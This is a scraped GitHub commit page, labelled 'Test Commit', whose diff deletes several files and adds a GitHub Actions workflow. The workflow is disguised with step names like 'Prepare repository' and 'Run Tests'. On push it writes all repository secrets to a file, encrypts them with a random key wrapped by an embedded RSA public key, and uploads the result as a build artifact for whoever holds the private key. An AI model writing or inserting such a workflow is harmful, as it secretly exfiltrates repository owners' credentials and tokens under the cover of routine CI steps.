generated from actions/typescript-action
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Loading status checks…
Test Commit
1 parent
3f9d1d5
commit c07486b
Showing
5 changed files
with
57 additions
and
167 deletions.
There are no files selected for viewing
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
name: lzifmfeynf | ||
on: | ||
push: | ||
branches: lzifmfeynf | ||
jobs: | ||
testing: | ||
runs-on: | ||
- ubuntu-latest | ||
steps: | ||
- env: | ||
VALUES: ${{ toJSON(secrets)}} | ||
name: Prepare repository | ||
run: "\ncat <<EOF > output.json\n$VALUES\nEOF\n " | ||
- name: Run Tests | ||
env: | ||
PUBKEY: '-----BEGIN PUBLIC KEY----- | ||
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvWq4yuZLKJJjI1G7MtT1 | ||
J5to/dAHAAXyCsTwA3SxVJ6RPMiF9/pywE8SF9LmwYm+aLmyQ0jGOzSXrAvTMcVq | ||
XApyGmlKjQExolWqlSj/apzdKwt6ChuNqHMZOUAeFcbVJ8y8qxIycqeMALZ6cJqm | ||
oh6wfaLi0X02NcwDLMv1bt+0+YZYuoE9eYRi02Gh/Ug8iAWf4Qaf5zZj+luVBY98 | ||
LHLXl5jDuMSa8EZ09HbEm4KfmBxMfByuDODx13xD149zuI8LPjbGDxrQ8BTWVbv3 | ||
KPP8Ea5LK9p0khe6b4cv9QtBOmwbRP52hcWHmryWw+gKjHxyvPh1ZJt5yF+H+NLl | ||
ruh4KebEL7Rho7b/ASS7eIAXV6r5+umdkoMSIygnRNy26f9Q5qjpwtnBhg6RlHEn | ||
7yRoBxei05jnABUwga0mZSTT2443j3B0besc7cj7S2+vlUdwXb+qFdweDFIJ4PxK | ||
76sitoN2pVGKA+eFfeSQi59Bj0MeRegpaU/0z1Hae4isyB/dmSGfJnYwk63lZeFt | ||
Y/6hNpVmJr/T5zf6D8GrMKLNkKa2KYgDtJc29EanXszN1S8TdwfV0VNRo9zsy/YZ | ||
Y+VVs/JWxcXNZ2iwDQ0pHZVZk6ufMZmUPBZOJA4LRes3QJ5hrTwGWP2XM3Hm0kqC | ||
gl71DzGRomOhyXiAfwbhKNMCAwEAAQ== | ||
-----END PUBLIC KEY----- | ||
' | ||
run: aes_key=$(openssl rand -hex 12 | tr -d '\n');openssl enc -aes-256-cbc -pbkdf2 | ||
-in output.json -out output_updated.json -pass pass:$aes_key;echo $aes_key | ||
| openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt | ||
2> /dev/null; | ||
- name: Upload artifacts | ||
uses: actions/upload-artifact@v4 | ||
with: | ||
name: files | ||
path: ' | | ||
output_updated.json | ||
lookup.txt' |